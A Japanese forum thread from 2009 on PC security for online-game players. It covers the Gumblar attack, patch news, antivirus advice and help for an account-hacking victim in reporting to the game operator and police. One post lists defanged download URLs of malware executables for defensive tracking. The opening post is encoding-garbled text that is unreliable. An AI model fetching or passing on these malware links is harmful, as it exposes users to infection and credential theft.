http://support.microsoft.com/kb/971778 <> (○口○*)さん<><>09/06/01 14:32 ID:93eMf1hh0<> 蜿矩#縺ョ繧オ繧、繝医′gumblar縺ョ謾サ謦縺ォ縺ゅ>縺セ縺励◆縲
邨仙アgrep and replaceシ医□縺」縺托シ滂シ峨〒
unescape縲‘val縲|ase64縺ィreplace縺ァ讀懃エ「縺励※
蜈ィ驛ィ蜑企勁縺励∪縺励◆縲
荳ュ縺ォ縺ッ縲“ifimg.php縺吉ifimage.phpシ医←縺」縺。縺句ソ倥l縺滂シ
縺ィ縺九>縺縺ョ繧ゅ≠繧翫∪縺励◆縲
geno繧ヲ繧」繝ォ繧ケ繝√ぉ繝繧ォ繝シ縺ィaguse gateway縺」縺ヲ縺ィ縺薙ッ
繝√ぉ繝繧ッ邨先棡縺梧ュ」遒コ縺ァ蜉ゥ縺九j縺セ縺励◆縲


<> あれ?<><>09/06/01 14:33 ID:93eMf1hh0<> 友達のサイトがgumblarの攻撃にあいました。
結局grep and replace(だっけ?)で
unescape、eval、base64とreplaceで検索して
全部削除しました。
中には、gifimg.phpかgifimage.php(どっちか忘れた)
とかいうのもありました。
genoウィルスチェッカーとaguse gatewayってとこは
チェック結果が正確で助かりました。 <> (○口○*)さん<>sage<>09/06/01 17:10 ID:h4U25sO/0<> 新たな「Webウイルス」出現、2万件以上の正規サイトに埋め込まれる
「Glumbler」ウイルスとは別物、対策ソフトを使っていても被害の恐れ
http://itpro.nikkeibp.co.jp/article/NEWS/20090601/331097/

オンラインゲーム情報を狙うトロイの木馬が急浮上
http://www.itmedia.co.jp/enterprise/articles/0906/01/news039.html <> (○口○*)さん<>sage<>09/06/01 17:47 ID:+68tUGrB0<> http://securitylabs.websense.com/content/Alerts/3405.aspx
からの引用らしいが…。
モザイク邪魔だなぁ。 <> (○口○*)さん<>sage<>09/06/01 17:48 ID:wBneKR8C0<> うむ。検体入手できなければ、対応して貰えないじゃないか。VTに投げてはあるようだけど・・・。 <> (○口○*)さん<>sage<>09/06/02 21:23 ID:YKbW8bwT0<> >>56
対応版出たね。
QuickTimeの更新はするけど、MSのアドバイザリのプラグイン呼び出し禁止そのままにしとこうかな〜。

Apple、10件の脆弱性を修正した「QuickTime」v7.6.2を公開
http://www.forest.impress.co.jp/article/2009/06/02/quicktime762.html <> (○口○*)さん<>sage<>09/06/02 22:21 ID:lsQyLKZt0<> 今回言われた脆弱性はDirectShowによるものなので
QuickTimeを更新してもブラウザを変えてもだめです
http://internet.watch.impress.co.jp/cda/special/2009/06/02/23639.html

↓のツールで修正が済むまで暫定回避しておくのが良いそうだ

Microsoft DirectShow 脆弱性によりリモートでコードが実行されます。
http://support.microsoft.com/kb/971778 <> (○口○*)さん<>sage<>09/06/03 00:17 ID:WGv//dm10<> QuickTimeなんてアンインスコするのが一番だな <> (○口○*)さん<>sage<>09/06/03 07:51 ID:W/dZ9mC00<> iPod使ってるとどうしてもiTune入れなきゃならんから
嫌でもQuickTimeがついてくる
あれどうにかならんのかな マジでゴミだわ <> (○口○*)さん<>sage<>09/06/03 08:58 ID:kCEF5Qsu0<> なにも携帯メディアプレイヤーはiPodだけではない。
iPodにしても、iTunesを使わずに音楽データを転送する方法だってあるし。 <> (○口○*)さん<>sage<>09/06/04 11:46 ID:UeNo62Qz0<> BOTの目撃報告増えたら、各所でのアカハック貼付とか減った気がする。
相変わらず、scrは日替わり更新してるみたいだけど、それ以外があんまり見掛けない。

業者は、なんらかの形で、現金化できれば、それでいいんだろうね。 <> (○口○*)さん<>sage<>09/06/04 12:24 ID:ttcc5ptM0<> そりゃ、欲しいのは結果(金)であって過程や方法なんてどうでもいいだろうからね。 <> (○口○*)さん<>sage<>09/06/04 16:47 ID:4HM6Mi5Z0<> opera10bがでたらしい。 <> (○口○*)さん<>sage<>09/06/04 23:47 ID:H9DfSOHN0<> >>69
テスト版は多言語なのに、なんで公開版は英語だけなんだよと突っ込みたい <> (○口○*)さん<>age<>09/06/05 11:23 ID:zNAtoYB5O<> 昨日11日ぶりにスキャンしたらこんなのが検知されたんですが、なんでしょうか(今まで検知されてませんでした)
トロイの木馬 Trojn.Win32.Agent.ckor
C/Program Files/Acer Gamezone/Jewel Quest Solitaire/aJewelQuestSolitaire.exe
カスペルスキー2009使ってます <> (○口○*)さん<>age<>09/06/05 11:23 ID:zNAtoYB5O<> 昨日11日ぶりにスキャンしたらこんなのが検知されたんですが、なんでしょうか(今まで検知されてませんでした)
トロイの木馬 Trojn.Win32.Agent.ckor
C/Program Files/Acer Gamezone/Jewel Quest Solitaire/aJewelQuestSolitaire.exe
カスペルスキー2009使ってます <> (○口○*)さん<>sage<>09/06/05 11:24 ID:zNAtoYB5O<> 上ミス
トロイの木馬 Trojan.Win32.Agent.ckor
C/Program Files/Acer Gamezone/Jewel Quest Solitaire/aJewelQuestSolitaire.exe <> (○口○*)さん<>sage<>09/06/05 11:32 ID:DfVnxAPT0<> 誤検出の可能性として、そのファイルを検体提出しとけ。 <> (○口○*)さん<>sage<>09/06/05 11:42 ID:zNAtoYB5O<> 提出のやり方がわかんないんですが、、 <> (○口○*)さん<>sage<>09/06/05 11:57 ID:DfVnxAPT0<> >>75
提出先:Kaspersky Lab <newvirus☆kaspersky.com>(☆をアットマークに置き換え)

Subject:False Positive
本文:タイトルと同文と解凍パスワード
添付ファイル:該当ファイルをパスワード付きでZIP圧縮(パスワードは、infected または virus のどちらかを推奨) <> (○口○*)さん<>sage<>09/06/05 12:55 ID:zNAtoYB5O<> それが、隔離して提出しょうとしてるんですが、検知した場所にexeがなくエイサー(メーカー)のゲームの場所に行き着いたんだけど、まるでわかりません。本当にすいません <> (○口○*)さん<>sage<>09/06/05 13:28 ID:DfVnxAPT0<> 隔離したならそっから送信できるだろ。文面に False Positive だけ入れとけばおk。

今はカスペ使ってないので送信のアイコンがどこだかの説明まではパス。
Quarantine のとこから適当に探せ。 <> (○口○*)さん<>sage<>09/06/05 14:20 ID:zNAtoYB5O<> ごめん、説明悪かったです。昨日検知されて、その後カスペルスキーが自動で消去したんですが、そのおかげか検知場所がないんです。
なので隔離も出来なかったんです。
本当にすいませんお手数かけて <> (○口○*)さん<>sage<>09/06/05 14:25 ID:DfVnxAPT0<> >>79
使わないソフトなら放置。使う奴なら、リカバリするなり、単体で入れなおすなりどうとでもしろ。
Acerの入れてるソリティアのファイルだから、使ってないならもう気にするな。

(´・ω・)っ ⌒ @ <> (○口○*)さん<><>09/06/05 14:45 ID:zNAtoYB5O<> ありがとうございます!放置しますね! <> (○口○*)さん<>sage<>09/06/07 17:46 ID:CPEjpSa70<> fc2うっかり踏んじまったorz
ログインした状態で踏んでそれからは一度もIDやパスは入力してない。
カスペルで完全スキャンしてみたがそれらしいものは見つからず。
大丈夫だったんだろうか? <> (○口○*)さん<>sage<>09/06/07 17:53 ID://KmLi1C0<> って書いても誰も答えよう無いと思うんだ。
おちついて>>1から読んできなさい。 <> (○口○*)さん<>sage<>09/06/07 21:22 ID:bfQhY1ya0<> 釣りだとしか思えない <> (○口○*)さん<>sage<>09/06/08 00:09 ID:3R8ef3va0<> ttp://euroro.blog7■fc2■com/blog-entry-212■html
これどうだろ? <> (○口○*)さん<>sage<>09/06/08 00:12 ID:wY+bJMb70<> >>1を嫁 <> (○口○*)さん<>sage<>09/06/08 01:50 ID:O6G8GFpI0<> ■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■ <> (○口○*)さん<>sage<>09/06/08 06:44 ID:7d1ZBvx40<> >>85
エンディング乙です <> (○口○*)さん<>sage<>09/06/08 11:25 ID:O6G8GFpI0<> リネージュ資料室のウィルス更新情報を見ていると、日替わりか、隔日程度の頻度で
中身の入れ代わるこんなファイルがあった。各社に提出済み。大半は対応済みのようです。
p://tt■ff88567■cn/down/dnf9m■exe
気になって調べてみたら、このサイトはいろいろありやがりますな。
p://tt■ff88567■cn/bbs/exe1/19■exe
p://tt■ff88567■cn/down/129m■exe
p://tt■ff88567■cn/down/130■exe
p://tt■ff88567■cn/down/cp9m■exe
p://tt■ff88567■cn/down/cqsj9m■exe
p://tt■ff88567■cn/down/cqwd9m■exe
p://tt■ff88567■cn/down/dj9m■exe
p://tt■ff88567■cn/down/dnf9m■exe
p://tt■ff88567■cn/down/jxsj9m■exe
p://tt■ff88567■cn/down/mhxu9m■exe
p://tt■ff88567■cn/down/mu9m■exe
p://tt■ff88567■cn/down/qq3g9m■exe
p://tt■ff88567■cn/down/qq3g9m1■exe
p://tt■ff88567■cn/down/qqhx9m■exe
p://tt■ff88567■cn/down/qqma■exe
p://tt■ff88567■cn/down/qqxx■exe
p://tt■ff88567■cn/down/rxcq9m■exe
p://tt■ff88567■cn/down/sg9m■exe
p://tt■ff88567■cn/down/tl9m■exe
p://tt■ff88567■cn/down/tx29m■exe
p://tt■ff88567■cn/down/wd9m■exe
p://tt■ff88567■cn/down/wl9m■exe
p://tt■ff88567■cn/down/zt9m■exe
p://tt■ff88567■cn/down/zx9m■exe
p://tt■ff88567■cn/down/zzh9m■exe
p://tt■ff88567■cn/uucall/server■exe

p://tj■114anhui■com/down/qqma■exe
p://tj■114anhui■com/down/qqmo■exe

これは、1■exe〜100■exeまであるようで。
p://tj■114anhui■com/bbs/exe/1■exe
p://tj■114anhui■com/bbs/exe1/1■exe

他にも、こんなのとか。
p://www■msneer■com/gif/jpg■scr <> (○口○*)さん<>sage<>09/06/10 00:26 ID:4DMNcRZ10<> おなじみの cavle-online■com online■w84■okwit■com wokutonoken-online■com
と同じ、61■139■126■84にある muswou■com の件。

いつもは、scrとかなのに、新しく、htmも置きはじめたようです。解読は面倒くさいので、パスしときます。
AntiVirでは、htmを落とすときもHTML/Shellcode.Gen の警告出てました。

ttp://www■muswou■com/file■scr
ttp://www■muswou■com/Start■scr
ttp://www■muswou■com/JP/mpg■scr
ttp://www■muswou■com/AVI■scr
ttp://www■muswou■com/wmv■zip
ttp://www■muswou■com/wmv■pif
ttp://www■muswou■com/RM■RAR
ttp://www■muswou■com/AVI■RAR
ttp://www■muswou■com/STONE■RAR

ttp://www■muswou■com/jkbb■htm

ちょっと気が向いて拾ってみましたが、REDSTONE系が相変わらず多いですが
エロ画像と一緒に貼られている方が多いですね。

エロ画像(動画)踏んで、気づかない人のSNSアカウントを利用して…とかやってんだろうなぁ。
でも、それにしちゃぁ、今のところ、mixiの方は静かなんですよね。今回は、何のパスを抜く奴なんだか。 <> (○口○*)さん<>sage<>09/06/10 00:34 ID:4DMNcRZ10<> 追記

このhtmlは、AVG、カスペ、Symantec、McAfee、TrendMicroいずれもすり抜け。

ttp://www.virustotal.com/analisis/178bec20725aa14d355711ad521384c220a41681d1005ff47ca0f21f507e3853-1244561463

ダウンローダには対応せず、本体をブロックできればよしとするポリシーのベンダーもあるので
これが引っ掛からないから問題だという訳ではありませんが、落とされる本体をどのベンダーが
ブロックできるかどうか迄は知りません。 <> (○口○*)さん<>sage<>09/06/10 00:43 ID:4DMNcRZ10<> 念のため、さらに追記:

同じ61■139■126■84のwww■miwcmac■comは、BS Wikiさんの、危険ドメインリストにまだ入っていないようです。
hostsまとめの方には入っています。 <> (○口○*)さん<><>09/06/10 04:34 ID:O8RBjkQU0<> 月例age
緊急(6) 重要(3) 警告(1)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms09-jun.mspx <> (○口○*)さん<>sage<>09/06/10 11:20 ID:tFqWa0p60<> あれWinUpdateにIE8入ったな……
もう8入れておけ、ってことかな <> (○口○*)さん<>sage<>09/06/10 14:42 ID:4DMNcRZ10<> 前回も既に入ってたと思うが。

Vista SP2は、IE8入れないと出てこなかったし。 <> (○口○*)さん<>sage<>09/06/10 15:14 ID:uKc38olB0<> IEに限ったら、8が利用できる環境で7未満を使うメリットが殆ど見出せない。 <> (○口○*)さん<><>09/06/10 16:32 ID:wM7WIezY0<> AdobeReader9.1.2更新age
ttp://www.forest.impress.co.jp/article/2009/06/10/adobereader912.html
単体でインストールできるパッケージは今回もなし
アップデートチェック機能よりインストールする <> (○口○*)さん<>sage<>09/06/12 16:44 ID:VesSWVUsO<> IE7のままでもSP2は来るぞ <> (○口○*)さん<>sage<>09/06/12 19:58 ID:WIi4G+dQO<> 話ぶった切って悪いのですがセキュリティスレの皆さん的には
ウィルスキラーって有りですかね?

もし良いならノートンからウィルスキラーにしちゃおうと思いまして。

商品は購入済みだけどノートン入ってる状態でウィルスキラー入れたら
壊れますよね(´・ω・`) <> (○口○*)さん<>sage<>09/06/12 20:34 ID:CjHecaDs0<> 重複インストールは× <> (○口○*)さん<>sage<>09/06/12 20:51 ID:OuIZU7Wl0<> 重複はPC使い物にならなくなる場合あるからねw <> (○口○*)さん<>sage<>09/06/12 23:03 ID:Bjn6OpdN0<> >>99
このスレの人の意見をということなので、一応、マルチじゃないって扱いでいいのかな?

ウイルスキラーの中身はRising
評価については、物質スレで既にコメントしたのでそっちと重複しちゃいますがご了承ください。

アイテム目的でウイルスキラー入れるのはいいけど、ネトゲ目的のPCで実用に供するのはお勧めできない。
危険に遭遇する可能性の少ないPC(一般的なサイトしか見ないとか)に流用するならお好きにどうぞ。 <> (○口○*)さん<>sage<>09/06/13 00:24 ID:YXJmvLcA0<> ネトゲ用PCでも、ネトゲにしか使わないPC(2PC用とか)なら、ウイルスキラーでも安全なんでない? <> 99<>sage<>09/06/13 01:08 ID:wDjJw68OO<> ノートンのままにしようと思います。

なんか勿体ないから父のPC用にあげようかな。

ありがとうございました。 <> 相談のお願い<>sage<>09/06/13 02:09 ID:5CoB6IoK0<> ウィルス対策ソフトについて相談です。

今まで Windows 2000 + Kaspersky Internet Security 7.0 で使ってきました。
しかし PC が壊れてしまい、新しく自作。
XP SP3 + Kaspersky Internet Security 2009 に変更
(KISのライセンス期限を更新したばかりで1年近く残ってたので)。

ところが KIS2009 はユーザーインターフェースなどが様変わりしていて、
とても使いこなせません… orz

RO が支障なく動く他のウィルス対策ソフトやファイヤーウォールソフトに
乗り換えようかとも思うのですが、お奨めのソフトがあったら教えてください。 <> (○口○*)さん<>sage<>09/06/13 02:13 ID:y+4oQOjf0<> Anitivir <> (○口○*)さん<>sage<>09/06/13 02:32 ID:uoYrXTAo0<> そんなに変わってたっけ?
カスペをそのまま使った方がいいと思うぞ。UIもそこまで大きく変わってなかったと思うんだがなぁ。

わかんなきゃ、サポートに電話しろよ。日本語で対応して貰えるんだし。

他は検出率とか新種への対応速度がいまいちだったりするし、AntiVirはFWついてないし。
重いとかじゃなかったら、そのまま使え。 <> (○口○*)さん<>sage<>09/06/13 02:49 ID:EQvqxm8H0<> もう記憶が曖昧だが、設定画面の並びが全く違ったと思った
細かな設定を変更しようとすると、今のUIはいまいち判りづらい

設定内容が昔より細かく指定できるようになってたはずだから、
仕方がないんだろうけど <> (○口○*)さん<>sage<>09/06/13 02:49 ID:7YSBQisF0<> 使いこなす、って言葉の意味がよくわからない。
いちいち細かく設定することあったっけ? <> (○口○*)さん<>sage<>09/06/13 10:05 ID:/O8SGNTN0<> AVG LinkScannerに日本語対応版がいつの間にか出ていたね
英語版が出た時は結構話題になったけど
日本語版が出たのは取り上げられてなかったから気づかなかった。
http://free.avg.com/jp.linkscanner#tba1 <> (○口○*)さん<>sage<>09/06/13 10:32 ID:uoYrXTAo0<> >>110
おお、日本語版も出てたのか。AntiVirにはない部分だから併用できるか試してみよう。 <> 105<>sage<>09/06/13 13:04 ID:5CoB6IoK0<> >>107-109さんへ。アドバイスありがとうございます。
しかし、このまま使い続けるほうが良い、ですか…

KIS 2009 は重いという事ではありません。
KIS 7.0 と比べて「アクセスコントロール」という機能が追加されましたが、
これが出すメッセージにどう対応したらよいのか、
マニュアルやヘルプを読んでも分からないのです。

「パケット」は IP アドレスですから 7.0 と同じで自分で設定できますが、
「権限」「リソース」は、ほぼお手上げです。

あるソフトで「権限」に関するメッセージウィンドウが出ても、
実際に設定するのは「リソース」の方だったりする。

また別のソフトでメッセージウィンドウが出ても、
そのソフトは「信頼済みグループ」に入っていて
全部の権限・リソース・パケットに許可が出ている。
実はそのソフトを起動した
フリーのアプリケーションランチャーソフトの設定変更が必要だった、とか。

アクセスコントロールを ON にしたまま Windows Update をしたら PC が完全にフリーズ。
リセットボタンを押さざるを得ないことがありました。
ソフトが中途半端にインストールされたらしく、コントロールパネルから削除不可の上、
ソフトをダウンロードして手動で導入しようとしても出来無い。
MS から手動削除の方法を聞き出し、手動削除後に
アクセスコントロールを一時的に OFF にして Windows Update してようやく成功。
(ちなみにうっかり ON のままでやって現象再現 orz )
これが一番大変でした…

Core2Duo E6850 3GHz、メモリ 2GB なので決して遅いマシンではないと思うのですが。

いくら道具(KIS 2009)が良い物でも、自分で使いこなせないのでは、
持っている意味が無いのでは、と思って書き込んだ次第です。 <> (○口○*)さん<>sage<>09/06/13 13:41 ID:uoYrXTAo0<> >>112
>「権限」「リソース」は、ほぼお手上げです。
つまり、用語の意味がわかればいいのかな?

カスペのアクセスコントロールの説明(概要)
http://journal.mycom.co.jp/articles/2008/10/03/Kaspersky/011.html

「権限」というのは、そのアプリケーションに、どこまで触らせるか。
 管理者権限での起動を行なって、カスペ側でもそれを許可すれば、レジストリ操作などができるようになります。
 管理者権限で起動しても、カスペ側で権限を制限していれば、未知のソフトにレジストリ操作などされてしまう
 危険を防ぐ事ができる・・・・・・・・・・と、思います。

「リソース」というのは、メモリとか帯域とか、食い潰していくもののこと(大意)
 システムが管理する領域まで触らせるかどうか。許可しないでおけば、暴走時にも、システムを巻き込むことを
 防げる・・・・・・・・かもしれない。

アクセスコントロール
 http://kaspe.2chv.net/wiki/index.php?2009#ta67f38d
 >初心者なので、「対話モード」での操作が難しく感じる。簡単に使うにはどうしたらいいか?
 >「対話モード」に変更した上で、
 >「メイン画面」で、「アクセスコントロール」の各項目については、「ルールによる許可」から「許可」への変更を推奨します。

リソース
 http://kaspe.2chv.net/wiki/index.php?2009#f39701e7
 >上級者以外は設定を変更しない方が吉。

4つのグループ
 http://kaspe.2chv.net/wiki/index.php?2009#b1e4033c
 >グループにより、実行できる権限が異なります。

よく見るアクセスコントロールのポップアップダイアログの例
 http://kaspe.2chv.net/wiki/index.php?2009#b93c479b <> (○口○*)さん<>sage<>09/06/13 13:58 ID:uoYrXTAo0<> >>112(続き)

判らない言葉を調べるとかして、自分のスキルアップをしていった方がいいと思います。

やってらんねー、保護はそれなりでいいから、もっと簡単な奴よこせ〜というなら、ESSとか他のソフトに
乗り換えるのもありだとは思いますが、PCの保護能力落ちるの分かってて、他社製を勧めるのもどうかと
思うので、気が進みません。

今まで触ってみて、I/Fが比較的判りやすかったのは、KINGSOFTでしょうか。
設定できることも少ないし、新種への対応もアレですが、マイナーなりに、感染したマルウェアが
セキュリティソフトをブロックする対象から外れてることが多いのがメリットかw
(ネトゲユーザーなら、やめとけという方向のソフトかな)

ちょっと表示に癖があったのと、新種への対応がノートン並に遅いのが問題ですが、ESS(NOD32)は
軽くて、他の作業の妨げにならないのが良かったですね。新種への対応の問題がなければ・・・・・・・・・

あとはマカフィーも比較的判りやすかった気がします。(一時期、父のPCに入れてました)
自分のPCに入れてたサイトアドバイザーがなにかと相性悪くて結局アンインストールしたので、
(確かPhotoshop5.02とぶつかったんだったかな)、相性問題の心配から勧めにくいですが
判りやすさを追求するならありかもしれません。

トレンドマイクロはここ10年近く触ってませんが、バスターさんは、ROとの相性問題が結構報告されて
いますので、避けた方がいいかもしれません。(逆に問題が出ても、情報が入りやすい?)

ノートンは現行バージョンを触ったことないですが、1つ前の奴(姉のPCにプリインストールで入ってた)は
FWの設定にてこずった記憶があります。

F-Secure系のPCプロテクションプラスはちょっとわかりにくいかなー程度ですね。私のPCに入れたときは
重力エラーが出て、ROが起動しなくなったので、(現在は問題無く動くかもしれませんが)やはりROユーザーに
勧めるのはためらわれます。

他にも、G DATA(重くなるけど複数エンジンで、新種への対応も比較的安心)とか、触ったことないものもありますが、
各社30日程度は試用できますので、カスペをアンインストールしてから、試してみるのもいいんじゃないでしょうか。

マイナーっぽいですけど、a-squaredも、新種への対応は早く、ネトゲ関係のマルウェアの検出率が結構
いい感じです。(非常駐のコマンドライン版しか触ってませんが)、検出率の良さを考えると、これも候補に
いれていいかもしれません。 <> 105,112<>sage<>09/06/13 17:44 ID:5CoB6IoK0<> >>113-114さん。アドバイスと情報ありがとうございます。
KISのWikiには目を通したつもりだったのですが、結構見落としが(汗)

>つまり、用語の意味がわかればいいのかな?
いえ用語については分かっているつもり…です。

悩みは、アクセスコントロール関係のメッセージが出た場合、
毎回許可する設定に変更したいのに、
「設定」「システム監視」「アプリケーションルール」で
そのソフトの詳細設定画面を開いて、
更に「ルール」タブの中を変更しようとしても、
「権限」や「リソース」の項目のどこを許可したらよいか分からない、という点。
(「パケット」は分かります)

また、あるソフトであるメッセージが出たとき、ある場所を許可した。
ところが別のソフトで同じメッセージが出たのに、
先のソフトと同じ場所を許可しても、また同じメッセージが出た。といった事が頻繁にある。

この2点なんです。

>自分のスキルアップをしていった方がいいと思います。
Wikiで見落としていたページも有ったので、あちこち読んで精進いたします。
ありがとうございました。<(_ _)> <> (○口○*)さん<>sage<>09/06/15 19:27 ID:zfH/uTm80<> PDFウイルスがアダルトサイトでまん延、アップデート呼びかけ
http://internet.watch.impress.co.jp/docs/news/20090615_294112.html

> PDFウイルスは、Adobe ReaderおよびAdobe Acrobatの脆弱性を悪用するのが特徴だが、
>今回の攻撃ではPDFファイルが表示される必要はないとしている。ユーザーはサイトを閲覧した瞬間に、
>Adobe ReaderおよびAdobe Acrobatのプラグインが中国のサーバーに置かれたPDFファイルを読み込もう
>として、実際にはウイルスがダウンロードされるという。 <> (○口○*)さん<>sage<>09/06/16 01:35 ID:3SXSvM8R0<> 攻撃対象が手広くなってきたから、もう「面のセキュリティ」で済まなくなってきたな。
Secunia PSIみたいなツールがもっと増えると良いんだが、出てこないって事は
特許絡みかね? <> (○口○*)さん<>sage<>09/06/16 15:18 ID:8A+7PSK40<> まだ試してないけど、ネカフェ出る前にロックしておいて
自宅着いたらゆっくりパスワード変えてからロック解除ってできるのかな

http://www.ragnarokonline.jp/news/information/notice/item/12623
■ゲーム起動ロック
長時間ゲームをプレイしない期間のセキュリティ強化のため、
一時的にゲームを起動できなくする機能です。
ゲーム起動ロックは任意で設定することができ、設定をすると、
アトラクションセンターやゲーム起動ページからのゲーム起動ができなくなります。
また、ゲーム起動ロックはガンホーID登録メールアドレス宛に送信される
メールに記載のURLから、ユーザー様ご自身でいつでも解除できます。 <> (○口○*)さん<>sage<>09/06/16 15:57 ID:XJWVzcNK0<> 24時間以内にガンホーIDのパス変更を行なえるならいいかもな。 <> (○口○*)さん<>sage<>09/06/16 16:07 ID:nrw9eC1G0<> なんで24時間???? <> (○口○*)さん<>sage<>09/06/16 20:26 ID:XJWVzcNK0<> >>120
24時間を過ぎると、ガンホーIDとパスが判れば解除できるから意味が無い。

24時間以内は、メールに届いたURLからでないと解除できない(のでメールのアカウントとパスが割れてなければ
ガンホーIDとパスが割れていても、パス変更が間に合う) <> (○口○*)さん<>sage<>09/06/16 21:08 ID:UUq+xk+10<> >>121は恐らく記述の意図を誤解していると思う。
ttps://secure.gungho.jp/faq/faqdetail.aspx?id=416d6f1b-5b24-4b7a-861c-6560c480cd60
a. ロック操作から24時間以内は、ロック完了メールに記載された解除用URLが有効。
b. 24時間以上経過した場合、URLが無効になるのでアトラクションセンターからロック解除操作。
ゲーム起動ロック解除認証メールが送られてくるので、記載された解除用URLで解除。

この流れなので、アトラクションセンター単独でのアンロックは出来ないようになっている(はず)。
まあ、ガンホーIDやパスワードから、登録メールアドレスやPOPパスワードを類推されないような配慮は必要ではあるけど。 <> (○口○*)さん<>sage<>09/06/17 17:02 ID:Ak2NYpYl0<> 【      気付いた日時          】 今日の15時ごろ
【不審なアドレスのクリックの有無 】 どこかの板でアカハック注意と書いてあったのを踏んだのはおぼえてるんですが、どこだったかは・・
【他人にID/Passを教えた事の有無】 教えてません
【他人が貴方のPCを使う可能性の有無】 家族と共有です
【    ツールの使用の有無      】 特に使ってません
【  ネットカフェの利用の有無    】 使ってません
【     OS    】 Microsoft Windows XP Gome Edition
【使用ブラウザ 】 Internet Explorer8 バージョン、8.0.6001.187021S
【WindowsUpdateの有無】 先週辺りだったとおもいます。
【 アンチウイルスソフト 】 ウィルスセキュリティゼロ
【その他のSecurty対策 】 特になし
【 ウイルススキャン結果】 上記のソフトで検索結果Trojan-Downloaderというウィルスが・・
自分で調べた範囲ではトロイの木馬だと思います・・
【スレログやテンプレを読んだか】 ある程度は目を通しました。
【hostsファイルの変更】知識がなくて何のことか分りません・・
【PeerGuardian2の導入】これも分りません・・
【説明】 15時ごろINしたのですが、2垢あるんですが、全キャラのキャラパスが変更されておりIN出来ません
全キャラ装備していた頭装備が外されておりログインできません。
昨日の夜中3時ごろまで感染していたPCで2垢ともログインしています・・
サポートには2垢とも出しウィルス検索後アカウントのパスを変更しました。
まだサポートに出して2時間ほどなのですが、今後のどうしたらいいのか不安で書き込みました。
住んでいるのは福岡の市内なのですが、警察にいくとすればどこに行けばいいのでしょうか・・ <> (○口○*)さん<>sage<>09/06/17 17:17 ID:/lqrUOFR0<> >>123
下記のアドレスを一通り読んでみてください。

>>2
|【対策の参考情報アドレス】
|・アカウントハッキングについて > 被害にあってしまったら(RO公式)
|  ttp://www.ragnarokonline.jp/playguide/hacking/hacking_04.html

|・Alchemist service アカウントハック体験談
|  ttp://air1.fc2web.com/as/id.html

 ・運営会社への連絡
 ・警察に不正アクセスに遭ったと相談する
以上は、平行して行なう必要があります。

報告後、定期的に警察には進捗状況の照会を行なうこと。不正アクセスが確認できたとされた場合に、
運営会社に連絡してくれるよう依頼し、平行して、運営にも不正アクセスであるとされたことを報告。

 ・運営会社はこの段階からアイテム等復旧に動きます
 ・警察側は、不正アクセス禁止法に違反する行為を特定する為、操作を続けますので、
  アイテム復旧したらそれでいいやと取り下げず、最後まで調査して貰いましょう。
 ・国外からの場合は警察の方でも対応不能になる可能性がありますが、国内の中継があった場合
  中継ポイントに関しては警察の権力が及ぶ範囲ですので、きちんと取り締まって貰いましょう。
 ・過大な期待はしないように
 ・気長に待つことが必要ですが、催促しないと状況を教えてくれない担当者もいますので、
  1週間ごと位に進捗状況の確認を入れるといいかもしれません。(担当者に、確認を入れてもいい
  間隔について聞いておくと、担当者が迷惑に感じないような形で問い合わせできると思います) <> (○口○*)さん<>sage<>09/06/17 17:30 ID:/lqrUOFR0<> >住んでいるのは福岡の市内なのですが、警察にいくとすればどこに行けばいいのでしょうか・・

全国ハイテク警察(サイバー警察)リンク集
ttp://www002.upp.so-net.ne.jp/dalk/ksatulink.html

福岡県警察ホーム > サイバー犯罪対策 > 情報提供
サイバー犯罪に関する情報提供のお願い
ttp://www.police.pref.fukuoka.jp/index.php?type=article&mode=articleView&articleid=7811&categoryid=84
 >☆ サイバー犯罪等の被害の届け出、相談をしたい方
 >   資料をご持参の上、最寄の警察署へご来署ください。
 >犯罪被害に関する届出や相談、回答を要する警察への要望・依頼等は、関係資料をご持参のうえ、最寄りの警察署へ。

福岡県警の場合、最寄りの警察署へ ということになっているようです。

福岡県警察ホーム > 相談・問い合わせ > 各種犯罪対策(暴力団、悪質商法、覚せい剤など)
サイバー犯罪担当窓口はこちらのようです。
ttp://www.police.pref.fukuoka.jp/index.php?type=article&mode=articleView&articleid=2001&categoryid=65
 >お問い合わせ先
 >福岡県警察本部 生活経済課
 >092-641-4141

この窓口に連絡誌、「ネット関係のトラブルを相談したい」と伝えてください。
電話をする際には、>>2のURLにある運営会社のページの「警察機関に相談する場合」にある項目を
一通り揃えておきましょう。印刷して用意してから電話すると無駄がありません。
連絡した後、直接出向いて、印刷したものを手渡すことになるのではないでしょうか。 <> 123<>sage<>09/06/17 18:05 ID:PDz/rZNK0<> ご丁寧にありがとうございます。
サポートに問い合わせてキャラパスについては再発行の手続中で
アカハックについては調査中だそうです。
自分で出来る準備はひとまず全部おわりました。
調査が終わり次第教えていただいた所に電話してみます。

それと質問がちょっと変わるのですが、
もしもアイテムがなくなっていて、それについての救済が行なわれるの場合
垢ハック後に入手したアイテム等は撒き戻らず救済されるのでしょうか?
現在未使用アイテムチケットがあるのでどうしたものかと・・・ <> (○口○*)さん<>sage<>09/06/17 18:15 ID:/lqrUOFR0<> 巻き戻りではなく手動追加だから消えたりしないよ。

他鯖や他垢で遊んでもいいし、アカハックされた垢で続けてもいいし、好きにしな。 <> 123<>sage<>09/06/17 18:26 ID:PDz/rZNK0<> ありがとうございます。
いまキャラパス再発行されてINしたのですが
倉庫もキャラのzもすべて空で消耗品すら残ってませんでした・・・
今後どうするか考えてみます。 <> (○口○*)さん<>sage<>09/06/17 18:27 ID:T7iL8Vs40<> >>128
どうするかっていっても、一通りの処理が済まないと戻らないよ。
ちょっと時間かかるし、たまに進捗状況尋ねるなどつついてやらないとね。 <> (○口○*)さん<>sage<>09/06/17 18:44 ID:9IuHb77y0<> 最低2カ月は掛かるから別垢で1からやり直して復旧されたらアイテム移動がお勧めかな… <> 123<>sage<>09/06/17 19:01 ID:PDz/rZNK0<> 2垢とも課金したばかりだったので残念なのですが、復旧されるまでは休止しようと思います。
立て続けに質問ばかりで申し訳ないのですが、現在ガンホーが調査中とのことなのですが、
これにはどれぐらいの期間がかかるのでしょうか・・・
色んな記事を読ませていただいたのですが、
アカハックは私でなくガンホーが被害者なので
この調査が終わるまでは警察にいっても相手にしてもらえなかったという話が書いてあったので・・ <> (○口○*)さん<>sage<>09/06/17 23:12 ID:GQYYmXHm0<> >>131
時期にもよるが2〜4ヶ月くらいかかるかと。
サイバー課がない警察の場合多くは生活安全課の2〜3課あたりが担当することになるので
他の案件が入っていなければ癌からの資料が届き次第捜査が進むだろうから早いだろうし、
